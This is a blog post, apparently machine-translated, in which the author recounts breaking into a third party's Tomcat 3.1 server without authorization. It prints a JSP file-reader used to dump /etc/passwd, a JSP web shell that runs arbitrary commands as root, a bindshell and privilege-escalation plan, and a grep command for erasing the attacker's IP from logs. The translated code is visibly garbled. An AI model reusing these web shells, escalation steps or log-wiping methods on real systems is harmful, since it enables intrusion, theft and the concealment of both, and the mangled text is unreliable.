Very occasionally an opportunity to browse to a website page fresh feel very comfortable. Website development with JSP, out of personal interest, I decided to test the security of the system.
telnet www.target.com 8080
GET / CHINANSL HTTP/1.1
[Enter]
[Enter]
Returned the following results:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 I386; java.vendor = Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text / html
Status: 404
<h1> Error: 404 </ h1>
<h2> Location: / CHINANSL </ h2> File Not Found <br> / CHINANSL
Running the webserver name "Tomcat 3.1. I remember this version of the vulnerabilities have been found and post has bugtrap up.
Recall that probably is ".." technology can exit WEB directory, so:
http://target:8080/../../../../% 00.jsp (not)
http://target:8080/file/index.jsp (not)
http://target:8080/index.JSP (not)
http://target:8080/index.jsp% 81 (not)
http://target:8080/index.js% 70 (not)
http://target:8080/index.jsp% 2581 (not)
http://target:8080/WEB-INF/ (not)
It seems the security situation seems to be pretty good, let us deeper test. Tomcat 3.1 comes with a management tool, you can view the directories and files under the web, and you can add context. So try:
http://target:8080/admin/
The administrators really did not remove or disable access to this directory, from a security point of view, this should be regarded as a more important mistakes.
Then, click "VIEW ALL Context" button, lists some of the files and directories in the web directory name, and soon found an upload file component, this component will be a JSP file upload to the other side of the web directory:
<% @ Page import = "java.io. *"%>
<%
String file = the request.getParameter (the file ");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try {
fis = new FileInputStream (file);
dis = new DataInputStream (fis);
while (true) {
try {
str = dis.readLine ();
} Catch (Exception e) {}
if (str == null) break;
to out.print (str + "<br>");
}
} Catch (IOException e) {}
%>
And execute:
http://target:8080/upload/test.jsp?file=/etc/passwd
Password. The next process is to guess the password did not succeed. However, it is now equivalent to have a SHELL, guess the password to IE as first SHELL environment.
Write a JSP file:
<% @ Page import = "java.io. *"%>
<%
try {
String cmd = request.getParameter ("cmd");
Process child = Runtime.getRuntime () exec (cmd);
InputStream in = child.getInputStream ();
int c;
while ((c = in.read ())! = -1) {
Out.print ((char) c);
}
In.close ();
try {
child.waitFor ();
} Catch (InterruptedException e) {
e.printStackTrace ();
}
} Catch (IOException e) {
System.err.println (e);
}
%>
Then the JSP and then upload upload SHELL.
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(See here is not listed)
How to gain root privileges? After some searching found that the system installed MySQL from the source code of JSP MySQL password, do:
sqld "> http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
Show:
root 87494 0.2 1.9 17300 4800 p0-S 28Jun01 5:54.72 / usr / local / data / mysql
The system is run as root MySQL. Then I thought, if we know that the MySQL password, it can write a shell program, it creates a table, and then my data into the table, and then use the "select ... into outfile; The way to create a file on the system, allowing users to perform su, run my program. (Remember apache.org once the invasion? Hackers used this approach).
After relatively simple, to upload bindshell a program such as running, the authority was nobody, help create a setuid shell using su root to become root.
However, the next has the actual operation, a surprising result:
http://target:8080/upload/cmd.jsp?cmd=id
Show:
UID = 0 (root) gid = 0 (xxx) groups = 0 (xxx), 2 (xxx) (xxx) (xxx) (xxx) (xxx), 31 (xxx)
The original WEB shell Originally is the root! Administrator's security settings in the end how to do?
http://target:8080/upload/cmd.jsp?cmd=ps+aux
It really is run as root (not listed)
The rest of the things:
1 delete my telnet record.
2, delete the http log.
Way to clear the log I use: cat xxx | grep-V "IP" >> temp then temp cover I modified the log file.
Point, I do not have to replace the pages of the site, because I'm just a network security enthusiasts. So, send out an email to tell the system admin! Of course, I am the way mentioned in the letter
No comments:
Post a Comment